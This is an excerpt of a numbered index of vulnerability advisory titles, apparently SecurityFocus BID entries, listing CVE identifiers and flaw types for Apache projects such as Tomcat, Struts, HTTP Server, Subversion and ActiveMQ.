14233| [85070] Apache Struts CVE-2016-2162 Cross Site Scripting Vulnerability
14234| [85066] Apache Struts CVE-2016-0785 Remote Code Execution Vulnerability
14235| [84422] Apache TomEE CVE-2016-0779 Unspecified Security Vulnerability
14236| [84321] Apache ActiveMQ CVE-2016-0734 Clickjacking Vulnerability
14237| [84316] Apache ActiveMQ CVE-2016-0782 Multiple Cross Site Scripting Vulnerabilities
14238| [83910] Apache Wicket CVE-2015-7520 Cross Site Scripting Vulnerability
14239| [83423] Apache Xerces-C CVE-2016-0729 Buffer Overflow Vulnerability
14240| [83330] Apache Tomcat CVE-2015-5351 Cross Site Request Forgery Vulnerability
14241| [83329] Apache Tomcat CVE-2015-5174 Directory Traversal Vulnerability
14242| [83328] Apache Tomcat CVE-2015-5345 Directory Traversal Vulnerability
14243| [83327] Apache Tomcat Security Manager CVE-2016-0714 Remote Code Execution Vulnerability
14244| [83326] Apache Tomcat CVE-2016-0763 Security Bypass Vulnerability
14245| [83324] Apache Tomcat Security Manager CVE-2016-0706 Information Disclosure Vulnerability
14246| [83323] Apache Tomcat CVE-2015-5346 Session Fixation Vulnerability
14247| [83259] Apache Hadoop CVE-2015-1776 Information Disclosure Vulnerability
14248| [83243] Apache Solr CVE-2015-8797 Cross Site Scripting Vulnerability
14249| [83119] Apache Sling CVE-2016-0956 Information Disclosure Vulnerability
14250| [83002] Apache CVE-2000-1205 Cross-Site Scripting Vulnerability
14251| [82871] Apache Ranger Authentication Bypass and Security Bypass Vulnerabilities
14252| [82800] Apache CloudStack CVE-2015-3251 Information Disclosure Vulnerability
14253| [82798] Apache CloudStack CVE-2015-3252 Authentication Bypass Vulnerability
14254| [82732] Apache Gallery CVE-2003-0771 Local Security Vulnerability
14255| [82676] Apache CVE-2003-1581 Cross-Site Scripting Vulnerability
14256| [82550] Apache Struts CVE-2015-5209 Security Bypass Vulnerability
14257| [82300] Apache Subversion CVE-2015-5259 Integer Overflow Vulnerability
14258| [82260] Apache Camel CVE-2015-5344 Remote Code Execution Vulnerability
14259| [82234] Apache Hive CVE-2015-7521 Security Bypass Vulnerability
14260| [82082] Apache CVE-1999-0289 Remote Security Vulnerability
14261| [81821] Apache Distribution for Solaris CVE-2007-2080 SQL-Injection Vulnerability
14262| [80696] Apache Camel CVE-2015-5348 Information Disclosure Vulnerability
14263| [80525] Apache CVE-2003-1580 Remote Security Vulnerability
14264| [80354] Drupal Apache Solr Search Module Access Bypass Vulnerability
14265| [80193] Apache CVE-1999-0107 Denial-Of-Service Vulnerability
14266| [79812] Apache Directory Studio CVE-2015-5349 Command Injection Vulnerability
14267| [79744] Apache HBase CVE-2015-1836 Unauthorized Access Vulnerability
14268| [79204] Apache TomEE 'EjbObjectInputStream' Remote Code Execution Vulnerability
14269| [77679] Apache Cordova For Android CVE-2015-8320 Weak Randomization Security Bypass Vulnerability
14270| [77677] Apache Cordova For Android CVE-2015-5256 Security Bypass Vulnerability
14271| [77591] Apache CXF SAML SSO Processing CVE-2015-5253 Security Bypass Vulnerability
14272| [77521] Apache Commons Collections 'InvokerTransformer.java' Remote Code Execution Vulnerability
14273| [77110] Apache HttpComponents HttpClient CVE-2015-5262 Denial of Service Vulnerability
14274| [77086] Apache Ambari CVE-2015-1775 Server Side Request Forgery Security Bypass Vulnerability
14275| [77085] Apache Ambari CVE-2015-3270 Remote Privilege Escalation Vulnerability
14276| [77082] Apache Ambari 'targetURI' Parameter Open Redirection Vulnerability
14277| [77059] Apache Ambari CVE-2015-3186 Cross Site Scripting Vulnerability
14278| [76933] Apache James Server Unspecified Command Execution Vulnerability
14279| [76832] Apache cordova-plugin-file-transfer CVE-2015-5204 HTTP Header Injection Vulnerability
14280| [76625] Apache Struts CVE-2015-5169 Cross Site Scripting Vulnerability
14281| [76624] Apache Struts CVE-2015-2992 Cross Site Scripting Vulnerability
14282| [76522] Apache Tapestry CVE-2014-1972 Security Bypass Vulnerability
14283| [76486] Apache CXF Fediz CVE-2015-5175 Denial of Service Vulnerability
14284| [76452] Apache ActiveMQ CVE-2015-1830 Directory Traversal Vulnerability
14285| [76446] Apache Subversion 'libsvn_fs_fs/tree.c' Denial of Service Vulnerability
14286| [76274] Apache Subversion CVE-2015-3184 Information Disclosure Vulnerability
14287| [76273] Apache Subversion CVE-2015-3187 Information Disclosure Vulnerability
14288| [76272] Apache ActiveMQ CVE-2014-3576 Denial of Service Vulnerability
14289| [76221] Apache Ranger CVE-2015-0266 Access Bypass Vulnerability
14290| [76208] Apache Ranger CVE-2015-0265 JavaScript Code Injection Vulnerability
14291| [76025] Apache ActiveMQ Artemis CVE-2015-3208 XML External Entity Information Disclosure Vulnerability
14292| [75965] Apache HTTP Server CVE-2015-3185 Security Bypass Vulnerability
14293| [75964] Apache HTTP Server CVE-2015-0253 Remote Denial of Service Vulnerability
14294| [75963] Apache HTTP Server CVE-2015-3183 Security Vulnerability
14295| [75940] Apache Struts CVE-2015-1831 Security Bypass Vulnerability
14296| [75919] Apache Groovy CVE-2015-3253 Remote Code Execution Vulnerability
14297| [75338] Apache Storm CVE-2015-3188 Remote Code Execution Vulnerability
14298| [75275] Drupal Apache Solr Real-Time Module Access Bypass Vulnerability
14299| [74866] Apache Cordova For Android CVE-2015-1835 Security Bypass Vulnerability
14300| [74839] Apache Sling API and Sling Servlets CVE-2015-2944 Cross Site Scripting Vulnerability
14301| [74761] Apache Jackrabbit CVE-2015-1833 XML External Entity Information Disclosure Vulnerability
14302| [74686] Apache Ambari '/var/lib/ambari-server/ambari-env.sh' Local Privilege Escalation Vulnerability
14303| [74665] Apache Tomcat CVE-2014-7810 Security Bypass Vulnerability
14304| [74475] Apache Tomcat CVE-2014-0230 Denial of Service Vulnerability
14305| [74423] Apache Struts CVE-2015-0899 Security Bypass Vulnerability
14306| [74338] Apache OpenOffice HWP Filter Memory Corruption Vulnerability
14307| [74265] Apache Tomcat 'mod_jk' CVE-2014-8111 Information Disclosure Vulnerability
14308| [74260] Apache Subversion CVE-2015-0248 Multiple Denial of Service Vulnerabilities
14309| [74259] Apache Subversion 'deadprops.c' Security Bypass Vulnerability
14310| [74204] PHP 'sapi/apache2handler/sapi_apache2.c' Remote Code Execution Vulnerability
14311| [74158] Apache HTTP Server 'protocol.c' Remote Denial of Service Vulnerability
14312| [73954] Apache Flex 'asdoc/templates/index.html' Cross Site Scripting Vulnerability
14313| [73851] Apache2 CVE-2012-0216 Cross-Site Scripting Vulnerability
14314| [73478] Apache Cassandra CVE-2015-0225 Remote Code Execution Vulnerability
14315| [73041] Apache HTTP Server 'mod_lua' Module Denial of Service Vulnerability
14316| [73040] Apache HTTP Server 'mod_lua.c' Local Access Bypass Vulnerability
14317| [72809] Apache Standard Taglibs CVE-2015-0254 XML External Entity Injection Vulnerability
14318| [72717] Apache Tomcat CVE-2014-0227 Chunk Request Remote Denial Of Service Vulnerability
14319| [72557] Apache WSS4J CVE-2015-0227 Security Bypass Vulnerability
14320| [72553] Apache WSS4J CVE-2015-0226 Information Disclosure Vulnerability
14321| [72513] Apache ActiveMQ CVE-2014-3612 LDAP Authentication Bypass Vulnerability
14322| [72511] Apache ActiveMQ CVE-2014-8110 Multiple Cross Site Scripting Vulnerabilities
14323| [72510] Apache ActiveMQ CVE-2014-3600 XML External Entity Injection Vulnerability
14324| [72508] Apache ActiveMQ Apollo CVE-2014-3579 XML External Entity Injection Vulnerability
14325| [72319] Apache Qpid CVE-2015-0223 Security Bypass Vulnerability
14326| [72317] Apache Qpid CVE-2015-0224 Incomplete Fix Multiple Denial of Service Vulnerabilities
14327| [72115] Apache Santuario 'XML Signature Verification' Security Bypass Vulnerability
14328| [72053] Apache HTTP Server 'mod_remoteip.c' IP Address Spoofing Vulnerability
14329| [72030] Apache Qpid CVE-2015-0203 Multiple Denial of Service Vulnerabilities
14330| [71879] Apache Traffic Server 'HttpTransact.cc' Denial of Service Vulnerability
14331| [71726] Apache Subversion CVE-2014-3580 Remote Denial of Service Vulnerability
14332| [71725] Apache Subversion CVE-2014-8108 Remote Denial of Service Vulnerability
14333| [71657] Apache HTTP Server 'mod_proxy_fcgi' Module Denial of Service Vulnerability
14334| [71656] Apache HTTP Server 'mod_cache' Module Denial of Service Vulnerability
14335| [71548] Apache Struts CVE-2014-7809 Security Bypass Vulnerability
14336| [71466] Apache Hadoop CVE-2014-3627 Information Disclosure Vulnerability
14337| [71353] Apache HTTP Server 'LuaAuthzProvider' Authorization Bypass Vulnerability
14338| [71004] Apache Qpid CVE-2014-3629 XML External Entity Injection Vulnerability
14339| [70970] Apache Traffic Server Cross Site Scripting Vulnerability
14340| [70738] Apache CXF CVE-2014-3584 Denial of Service Vulnerability
14341| [70736] Apache CXF SAML SubjectConfirmation Security Bypass Vulnerability
14342| [69728] Apache Tomcat CVE-2013-4444 Arbitrary File Upload Vulnerability
14343| [69648] Apache POI CVE-2014-3574 Denial Of Service Vulnerability
14344| [69647] Apache POI OpenXML parser CVE-2014-3529 XML External Entity Information Disclosure Vulnerability
14345| [69351] Apache OpenOffice Calc CVE-2014-3524 Command Injection Vulnerability
14346| [69295] Apache Axis Incomplete Fix CVE-2014-3596 SSL Certificate Validation Security Bypass Vulnerability
14347| [69286] Apache OFBiz CVE-2014-0232 Multiple Cross Site Scripting Vulnerabilities
14348| [69258] Apache HttpComponents Incomplete Fix CVE-2014-3577 SSL Validation Security Bypass Vulnerability
14349| [69257] Apache HttpComponents Incomplete Fix SSL Certificate Validation Security Bypass Vulnerability
14350| [69248] Apache HTTP Server CVE-2013-4352 Remote Denial of Service Vulnerability
14351| [69237] Apache Subversion CVE-2014-3522 SSL Certificate Validation Information Disclosure Vulnerability
14352| [69173] Apache Traffic Server CVE-2014-3525 Unspecified Security Vulnerability
14353| [69046] Apache Cordova For Android CVE-2014-3502 Information Disclosure Vulnerability
14354| [69041] Apache Cordova For Android CVE-2014-3501 Security Bypass Vulnerability
14355| [69038] Apache Cordova For Android CVE-2014-3500 Security Bypass Vulnerability
14356| [68995] Apache Subversion CVE-2014-3528 Insecure Authentication Weakness
14357| [68966] Apache Subversion 'irkerbridge.py' Local Privilege Escalation Vulnerability
14358| [68965] Apache Subversion 'svnwcsub.py' Local Privilege Escalation Vulnerability
14359| [68863] Apache HTTP Server 'mod_cache' Module Remote Denial of Service Vulnerability
14360| [68747] Apache HTTP Server CVE-2014-3523 Remote Denial of Service Vulnerability
14361| [68745] Apache HTTP Server CVE-2014-0118 Remote Denial of Service Vulnerability
14362| [68742] Apache HTTP Server CVE-2014-0231 Remote Denial of Service Vulnerability
14363| [68740] Apache HTTP Server CVE-2014-0117 Remote Denial of Service Vulnerability
14364| [68678] Apache HTTP Server 'mod_status' CVE-2014-0226 Remote Code Execution Vulnerability
14365| [68445] Apache CXF UsernameToken Information Disclosure Vulnerability
14366| [68441] Apache CXF SAML Tokens Validation Security Bypass Vulnerability
14367| [68431] Apache Syncope CVE-2014-3503 Insecure Password Generation Weakness
14368| [68229] Apache Harmony PRNG Entropy Weakness
14369| [68111] Apache 'mod_wsgi' Module Privilege Escalation Vulnerability
14370| [68072] Apache Tomcat CVE-2014-0186 Remote Denial of Service Vulnerability
14371| [68039] Apache Hive CVE-2014-0228 Security Bypass Vulnerability
14372| [67673] Apache Tomcat CVE-2014-0095 AJP Request Remote Denial Of Service Vulnerability
14373| [67671] Apache Tomcat CVE-2014-0075 Chunk Request Remote Denial Of Service Vulnerability
14374| [67669] Apache Tomcat CVE-2014-0119 XML External Entity Information Disclosure Vulnerability
14375| [67668] Apache Tomcat CVE-2014-0099 Request Processing Information Disclosure Vulnerability
14376| [67667] Apache Tomcat CVE-2014-0096 XML External Entity Information Disclosure Vulnerability
14377| [67534] Apache 'mod_wsgi' Module CVE-2014-0242 Information Disclosure Vulnerability
14378| [67532] Apache 'mod_wsgi' Module Local Privilege Escalation Vulnerability
14379| [67530] Apache Solr Search Template Cross Site Scripting Vulnerability
14380| [67236] Apache CXF CVE-2014-0109 Remote Denial of Service Vulnerability
14381| [67232] Apache CXF CVE-2014-0110 Denial of Service Vulnerability
14382| [67121] Apache Struts ClassLoader Manipulation CVE-2014-0114 Security Bypass Vulnerability
14383| [67081] Apache Struts 'getClass()' Method Security Bypass Vulnerability
14384| [67064] Apache Struts ClassLoader Manipulation Incomplete Fix Security Bypass Vulnerability
14385| [67013] Apache Zookeeper CVE-2014-0085 Local Information Disclosure Vulnerability
14386| [66998] Apache Archiva CVE-2013-2187 Unspecified Cross Site Scripting Vulnerability
14387| [66991] Apache Archiva CVE-2013-2187 HTML Injection Vulnerability
14388| [66927] Apache Syncope CVE-2014-0111 Remote Code Execution Vulnerability
14389| [66474] Apache CouchDB Universally Unique IDentifier (UUID) Remote Denial of Service Vulnerability
14390| [66397] Apache Xalan-Java Library CVE-2014-0107 Security Bypass Vulnerability
14391| [66303] Apache HTTP Server Multiple Denial of Service Vulnerabilities
14392| [66041] RETIRED: Apache Struts CVE-2014-0094 Classloader Manipulation Security Bypass Vulnerability
14393| [65999] Apache Struts ClassLoader Manipulation CVE-2014-0094 Security Bypass Vulnerability
14394| [65967] Apache Cordova File-Transfer Unspecified Security Vulnerability
14395| [65959] Apache Cordova InAppBrowser Remote Privilege Escalation Vulnerability
14396| [65935] Apache Shiro 'login.jsp' Authentication Bypass Vulnerability
14397| [65902] Apache Camel CVE-2014-0003 Remote Code Execution Vulnerability
14398| [65901] Apache Camel CVE-2014-0002 XML External Entity Information Disclosure Vulnerability
14399| [65773] Apache Tomcat CVE-2013-4286 Security Bypass Vulnerability
14400| [65769] Apache Tomcat CVE-2014-0033 Session Fixation Vulnerability
14401| [65768] Apache Tomcat CVE-2013-4590 XML External Entity Information Disclosure Vulnerability
14402| [65767] Apache Tomcat CVE-2013-4322 Incomplete Fix Denial of Service Vulnerability
14403| [65615] Apache ActiveMQ 'refresh' Parameter Cross Site Scripting Vulnerability
14404| [65434] Apache Subversion 'mod_dav_svn' Module SVNListParentPath Denial of Service Vulnerability
14405| [65431] Apache Wicket CVE-2013-2055 Information Disclosure Vulnerability
14406| [65400] Apache Commons FileUpload CVE-2014-0050 Denial Of Service Vulnerability
14407| [64782] Apache CloudStack Virtual Router Component Security Bypass Vulnerability
14408| [64780] Apache CloudStack Unauthorized Access Vulnerability
14409| [64617] Apache Libcloud Digital Ocean API Local Information Disclosure Vulnerability
14410| [64437] Apache Santuario XML Security For JAVA XML Signature Denial of Service Vulnerability
14411| [64427] Apache Solr Multiple XML External Entity Injection Vulnerabilities
14412| [64009] Apache Solr CVE-2013-6408 XML External Entity Injection Vulnerability
14413| [64008] Apache Solr CVE-2013-6407 XML External Entity Injection Vulnerability
14414| [63981] Apache Subversion 'mod_dav_svn' Module Denial of Service Vulnerability
14415| [63966] Apache Subversion CVE-2013-4505 Security Bypass Vulnerability
14416| [63963] Apache Roller CVE-2013-4171 Cross Site Scripting Vulnerability
14417| [63935] Apache Solr 'SolrResourceLoader' Directory Traversal Vulnerability
14418| [63928] Apache Roller CVE-2013-4212 OGNL Expression Injection Remote Code Execution Vulnerability
14419| [63515] Apache Tomcat Manager Component CVE-2013-6357 Cross Site Request Forgery Vulnerability
14420| [63403] Apache Struts Multiple Cross Site Scripting Vulnerabilities
14421| [63400] Apache 'mod_pagespeed' Module Unspecified Cross Site Scripting Vulnerability
14422| [63260] Apache Shindig CVE-2013-4295 XML External Entity Information Disclosure Vulnerability
14423| [63241] Apache Sling 'AbstractAuthenticationFormServlet' Open Redirection Vulnerability
14424| [63174] Apache Commons FileUpload 'DiskFileItem' Class Null Byte Arbitrary File Write Vulnerability
14425| [62939] Apache 'mod_fcgid' Module CVE-2013-4365 Heap Buffer Overflow Vulnerability
14426| [62903] Apache Sling 'deepGetOrCreateNode()' Function Denial Of Service Vulnerability
14427| [62706] Apache Camel CVE-2013-4330 Information Disclosure Vulnerability
14428| [62677] Apache 'mod_accounting' Module CVE-2013-5697 SQL Injection Vulnerability
14429| [62674] TYPO3 Apache Solr Unspecified Cross Site Scripting and PHP Code Execution Vulnerabilities
14430| [62587] Apache Struts CVE-2013-4316 Remote Code Execution Vulnerability
14431| [62584] Apache Struts CVE-2013-4310 Security Bypass Vulnerability
14432| [62266] Apache Subversion CVE-2013-4277 Insecure Temporary File Creation Vulnerability
14433| [61984] Apache Hadoop RPC Authentication CVE-2013-2192 Man in the Middle Security Bypass Vulnerability
14434| [61981] Apache HBase RPC Authentication Man In The Middle Security Bypass Vulnerability
14435| [61638] Apache CloudStack CVE-2013-2136 Multiple Cross Site Scripting Vulnerabilities
14436| [61454] Apache Subversion CVE-2013-4131 Denial Of Service Vulnerability
14437| [61379] Apache HTTP Server CVE-2013-2249 Unspecified Remote Security Vulnerability
14438| [61370] Apache OFBiz CVE-2013-2317 'View Log' Cross Site Scripting Vulnerability
14439| [61369] Apache OFBiz Nested Expression Remote Code Execution Vulnerability
14440| [61196] Apache Struts CVE-2013-2248 Multiple Open Redirection Vulnerabilities
14441| [61189] Apache Struts CVE-2013-2251 Multiple Remote Command Execution Vulnerabilities
14442| [61129] Apache HTTP Server CVE-2013-1896 Remote Denial of Service Vulnerability
14443| [61030] Apache CXF CVE-2013-2160 Multiple Remote Denial of Service Vulnerabilities
14444| [60875] Apache Geronimo RMI Classloader Security Bypass Vulnerability
14445| [60846] Apache Santuario XML Security for JAVA XML Signature CVE-2013-2172 Security Bypass Vulnerability
14446| [60817] Apache Santuario XML Security for C++ CVE-2013-2210 Heap Buffer Overflow Vulnerability
14447| [60800] Apache Qpid Python Client SSL Certificate Verification Information Disclosure Vulnerability
14448| [60599] Apache Santuario XML Security for C++ CVE-2013-2156 Remote Heap Buffer Overflow Vulnerability
14449| [60595] Apache Santuario XML Security for C++ XML Signature CVE-2013-2155 Denial of Service Vulnerability
14450| [60594] Apache Santuario XML Security for C++ CVE-2013-2154 Stack Buffer Overflow Vulnerability
14451| [60592] Apache Santuario XML Security for C++ XML Signature CVE-2013-2153 Security Bypass Vulnerability
14452| [60534] Apache OpenJPA Object Deserialization Arbitrary File Creation or Overwrite Vulnerability
14453| [60346] Apache Struts CVE-2013-2134 OGNL Expression Injection Vulnerability
14454| [60345] Apache Struts CVE-2013-2135 OGNL Expression Injection Vulnerability
14455| [60267] Apache Subversion CVE-2013-1968 Remote Denial of Service Vulnerability
14456| [60265] Apache Subversion CVE-2013-2088 Command Injection Vulnerability
14457| [60264] Apache Subversion CVE-2013-2112 Remote Denial of Service Vulnerability
14458| [60187] Apache Tomcat DIGEST Authentication CVE-2013-2051 Incomplete Fix Security Weakness
14459| [60186] Apache Tomcat CVE-2013-1976 Insecure Temporary File Handling Vulnerability
14460| [60167] Apache Struts 'includeParams' CVE-2013-2115 Incomplete Fix Security Bypass Vulnerability
14461| [60166] Apache Struts 'includeParams' CVE-2013-1966 Security Bypass Vulnerability
14462| [60082] Apache Struts 'ParameterInterceptor' Class OGNL CVE-2013-1965 Security Bypass Vulnerability
14463| [59826] Apache HTTP Server Terminal Escape Sequence in Logs Command Injection Vulnerability
14464| [59799] Apache Tomcat CVE-2013-2067 Session Fixation Vulnerability
14465| [59798] Apache Tomcat CVE-2013-2071 Information Disclosure Vulnerability
14466| [59797] Apache Tomcat CVE-2012-3544 Denial of Service Vulnerability
14467| [59670] Apache VCL Multiple Input Validation Vulnerabilities
14468| [59464] Apache CloudStack CVE-2013-2758 Hash Information Disclosure Vulnerability
14469| [59463] Apache CloudStack CVE-2013-2756 Authentication Bypass Vulnerability
14470| [59402] Apache ActiveMQ CVE-2013-3060 Information Disclosure and Denial of Service Vulnerability
14471| [59401] Apache ActiveMQ CVE-2012-6551 Denial of Service Vulnerability
14472| [59400] Apache ActiveMQ CVE-2012-6092 Multiple Cross Site Scripting Vulnerabilities
14473| [58898] Apache Subversion CVE-2013-1884 Remote Denial of Service Vulnerability
14474| [58897] Apache Subversion 'mod_dav_svn/lock.c' Remote Denial of Service Vulnerability
14475| [58895] Apache Subversion 'mod_dav_svn' Remote Denial of Service Vulnerability
14476| [58455] Apache Rave User RPC API CVE-2013-1814 Information Disclosure Vulnerability
14477| [58379] Apache Qpid CVE-2012-4446 Authentication Bypass Vulnerability
14478| [58378] Apache Qpid CVE-2012-4460 Denial of Service Vulnerability
14479| [58376] Apache Qpid CVE-2012-4458 Denial of Service Vulnerability
14480| [58337] Apache Qpid CVE-2012-4459 Denial of Service Vulnerability
14481| [58326] Apache Commons FileUpload CVE-2013-0248 Insecure Temporary File Creation Vulnerability
14482| [58325] Debian Apache HTTP Server CVE-2013-1048 Symlink Attack Local Privilege Escalation Vulnerability
14483| [58323] Apache Subversion 'svn_fs_file_length()' Remote Denial of Service Vulnerability
14484| [58165] Apache HTTP Server Multiple Cross Site Scripting Vulnerabilities
14485| [58136] Apache Maven CVE-2013-0253 SSL Certificate Validation Security Bypass Vulnerability
14486| [58124] Apache Tomcat 'log/logdir' Directory Insecure File Permissions Vulnerability
14487| [58073] Apache Commons HttpClient CVE-2012-5783 SSL Certificate Validation Security Bypass Vulnerability
14488| [57876] Apache CXF WS-SecurityPolicy Authentication Bypass Vulnerability
14489| [57874] Apache CXF CVE-2012-5633 Security Bypass Vulnerability
14490| [57463] Apache OFBiz CVE-2013-0177 Multiple Cross Site Scripting Vulnerabilities
14491| [57425] Apache CXF CVE-2012-5786 SSL Certificate Validation Security Bypass Vulnerability
14492| [57321] Apache CouchDB CVE-2012-5650 Cross Site Scripting Vulnerability
14493| [57314] Apache CouchDB CVE-2012-5649 Remote Code Execution Vulnerability
14494| [57267] Apache Axis2/C SSL Certificate Validation Security Bypass Vulnerability
14495| [57259] Apache CloudStack CVE-2012-5616 Local Information Disclosure Vulnerability
14496| [56814] Apache Tomcat CVE-2012-4431 Cross-Site Request Forgery Vulnerability
14497| [56813] Apache Tomcat CVE-2012-4534 Denial of Service Vulnerability
14498| [56812] Apache Tomcat CVE-2012-3546 Security Bypass Vulnerability
14499| [56753] Apache Apache HTTP Server 'mod_proxy_ajp Module Denial Of Service Vulnerability
14500| [56686] Apache Tomcat CVE-2012-5568 Denial of Service Vulnerability
14501| [56408] Apache Axis and Axis2/Java SSL Certificate Validation Security Bypass Vulnerability
14502| [56403] Apache Tomcat DIGEST Authentication Multiple Security Weaknesses
14503| [56402] Apache Tomcat CVE-2012-2733 Denial of Service Vulnerability
14504| [56171] Apache OFBiz CVE-2012-3506 Unspecified Security Vulnerability
14505| [55876] Apache CloudStack CVE-2012-4501 Security Bypass Vulnerability
14506| [55628] Apache CXF SOAP Action Spoofing Security Bypass Vulnerability
14507| [55608] Apache Qpid (qpidd) Denial of Service Vulnerability
14508| [55536] Apache 'mod_pagespeed' Module Cross Site Scripting and Security Bypass Vulnerabilities
14509| [55508] Apache Axis2 XML Signature Wrapping Security Vulnerability
14510| [55445] Apache Wicket CVE-2012-3373 Cross Site Scripting Vulnerability
14511| [55346] Apache Struts Cross Site Request Forgery and Denial of Service Vulnerabilities
14512| [55290] Drupal Apache Solr Autocomplete Module Cross Site Scripting Vulnerability
14513| [55165] Apache Struts2 Skill Name Remote Code Execution Vulnerability
14514| [55154] Apache 'mod-rpaf' Module Denial of Service Vulnerability
14515| [55131] Apache HTTP Server HTML-Injection And Information Disclosure Vulnerabilities
14516| [54954] Apache QPID NullAuthenticator Authentication Bypass Vulnerability
14517| [54798] Apache Libcloud Man In The Middle Vulnerability
14518| [54358] Apache Hadoop CVE-2012-3376 Information Disclosure Vulnerability
14519| [54341] Apache Sling CVE-2012-2138 Denial Of Service Vulnerability
14520| [54268] Apache Hadoop Symlink Attack Local Privilege Escalation Vulnerability
14521| [54189] Apache Roller Cross Site Request Forgery Vulnerability
14522| [54187] Apache Roller CVE-2012-2381 Cross Site Scripting Vulnerability
14523| [53880] Apache CXF Child Policies Security Bypass Vulnerability
14524| [53877] Apache CXF Elements Validation Security Bypass Vulnerability
14525| [53676] Apache Commons Compress and Apache Ant CVE-2012-2098 Denial Of Service Vulnerability
14526| [53487] Apache POI CVE-2012-0213 Denial Of Service Vulnerability
14527| [53455] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability
14528| [53305] Apache Qpid CVE-2011-3620 Unauthorized Access Security Bypass Vulnerability
14529| [53046] Apache HTTP Server 'LD_LIBRARY_PATH' Insecure Library Loading Arbitrary Code Execution Vulnerability
14530| [53025] Apache OFBiz Unspecified Remote Code Execution Vulnerability
14531| [53023] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
14532| [52939] Apache Hadoop CVE-2012-1574 Unspecified User Impersonation Vulnerability
14533| [52702] Apache Struts2 'XSLTResult.java' Remote Arbitrary File Upload Vulnerability
14534| [52696] Apache Traffic Server HTTP Host Header Handling Heap Based Buffer Overflow Vulnerability
14535| [52680] Apache Wicket 'pageMapName' Parameter Cross Site Scripting Vulnerability
14536| [52679] Apache Wicket Hidden Files Information Disclosure Vulnerability
14537| [52565] Apache 'mod_fcgid' Module Denial Of Service Vulnerability
14538| [52146] TYPO3 Apache Solr Extension Unspecified Cross Site Scripting Vulnerability
14539| [51939] Apache MyFaces 'ln' Parameter Information Disclosure Vulnerability
14540| [51917] Apache APR Hash Collision Denial Of Service Vulnerability
14541| [51902] Apache Struts Multiple HTML Injection Vulnerabilities
14542| [51900] Apache Struts CVE-2012-1007 Multiple Cross Site Scripting Vulnerabilities
14543| [51886] Apache CXF UsernameToken Policy Validation Security Bypass Vulnerability
14544| [51869] Apache HTTP Server CVE-2011-3639 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
14545| [51706] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
14546| [51705] Apache HTTP Server CVE-2012-0021 mod_log_config Denial Of Service Vulnerability
14547| [51628] Apache Struts 'ParameterInterceptor' Class OGNL (CVE-2011-3923) Security Bypass Vulnerability
14548| [51447] Apache Tomcat Parameter Handling Denial of Service Vulnerability
14549| [51442] Apache Tomcat Request Object Security Bypass Vulnerability
14550| [51407] Apache HTTP Server Scoreboard Local Security Bypass Vulnerability
14551| [51257] Apache Struts Remote Command Execution and Arbitrary File Overwrite Vulnerabilities
14552| [51238] Apache Geronimo Hash Collision Denial Of Service Vulnerability
14553| [51200] Apache Tomcat Hash Collision Denial Of Service Vulnerability
14554| [50940] Apache Struts Session Tampering Security Bypass Vulnerability
14555| [50912] RETIRED: Apache MyFaces CVE-2011-4343 Information Disclosure Vulnerability
14556| [50904] Apache ActiveMQ Failover Mechanism Remote Denial Of Service Vulnerability
14557| [50848] Apache MyFaces EL Expression Evaluation Security Bypass Vulnerability
14558| [50802] Apache HTTP Server 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
14559| [50639] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
14560| [50603] Apache Tomcat Manager Application Security Bypass Vulnerability
14561| [50494] Apache HTTP Server 'ap_pregsub()' Function Local Privilege Escalation Vulnerability
14562| [49957] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
14563| [49762] Apache Tomcat HTTP DIGEST Authentication Multiple Security Weaknesses
14564| [49728] Apache Struts Conversion Error OGNL Expression Evaluation Vulnerability
14565| [49616] Apache HTTP Server CVE-2011-3348 Denial Of Service Vulnerability
14566| [49470] Apache Tomcat CVE-2007-6286 Duplicate Request Processing Security Vulnerability
14567| [49353] Apache Tomcat AJP Protocol Security Bypass Vulnerability
14568| [49303] Apache HTTP Server CVE-2011-3192 Denial Of Service Vulnerability
14569| [49290] Apache Wicket Cross Site Scripting Vulnerability
14570| [49147] Apache Tomcat CVE-2011-2481 Information Disclosure Vulnerability
14571| [49143] Apache Commons Daemon 'jsvc' Information Disclosure Vulnerability
14572| [48667] Apache Tomcat 'sendfile' Request Attributes Information Disclosure Vulnerability
14573| [48653] Apache 'mod_authnz_external' Module SQL Injection Vulnerability
14574| [48611] Apache XML Security for C++ Signature Key Parsing Denial of Service Vulnerability
14575| [48456] Apache Tomcat 'MemoryUserDatabase' Information Disclosure Vulnerability
14576| [48015] Apache Archiva Multiple Cross Site Request Forgery Vulnerabilities
14577| [48011] Apache Archiva Multiple Cross Site Scripting and HTML Injection Vulnerabilities
14578| [47929] Apache APR 'apr_fnmatch.c' Denial of Service Vulnerability
14579| [47890] Apache Struts 'javatemplates' Plugin Multiple Cross Site Scripting Vulnerabilities
14580| [47886] Apache Tomcat SecurityConstraints Security Bypass Vulnerability
14581| [47820] Apache APR 'apr_fnmatch()' Denial of Service Vulnerability
14582| [47784] Apache Struts XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability
14583| [47199] Apache Tomcat HTTP BIO Connector Information Disclosure Vulnerability
14584| [47196] Apache Tomcat Login Constraints Security Bypass Vulnerability
14585| [46974] Apache HttpComponents 'HttpClient' Information Disclosure Vulnerability
14586| [46953] Apache MPM-ITK Module Security Weakness
14587| [46734] Subversion 'mod_dav_svn' Apache Server NULL Pointer Dereference Denial Of Service Vulnerability
14588| [46685] Apache Tomcat '@ServletSecurity' Annotations Security Bypass Vulnerability
14589| [46311] Apache Continuum and Archiva Cross Site Scripting Vulnerability
14590| [46177] Apache Tomcat SecurityManager Security Bypass Vulnerability
14591| [46174] Apache Tomcat HTML Manager Interface HTML Injection Vulnerability
14592| [46166] Apache Tomcat JVM Denial of Service Vulnerability
14593| [46164] Apache Tomcat NIO Connector Denial of Service Vulnerability
14594| [46066] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
14595| [45655] Apache Subversion Server Component Multiple Remote Denial Of Service Vulnerabilities
14596| [45123] Awstats Apache Tomcat Configuration File Remote Arbitrary Command Execution Vulnerability
14597| [45095] Apache Archiva Cross Site Request Forgery Vulnerability
14598| [45015] Apache Tomcat 'sort' and 'orderBy' Parameters Cross Site Scripting Vulnerabilities
14599| [44900] Apache 'mod_fcgid' Module Unspecified Stack Buffer Overflow Vulnerability
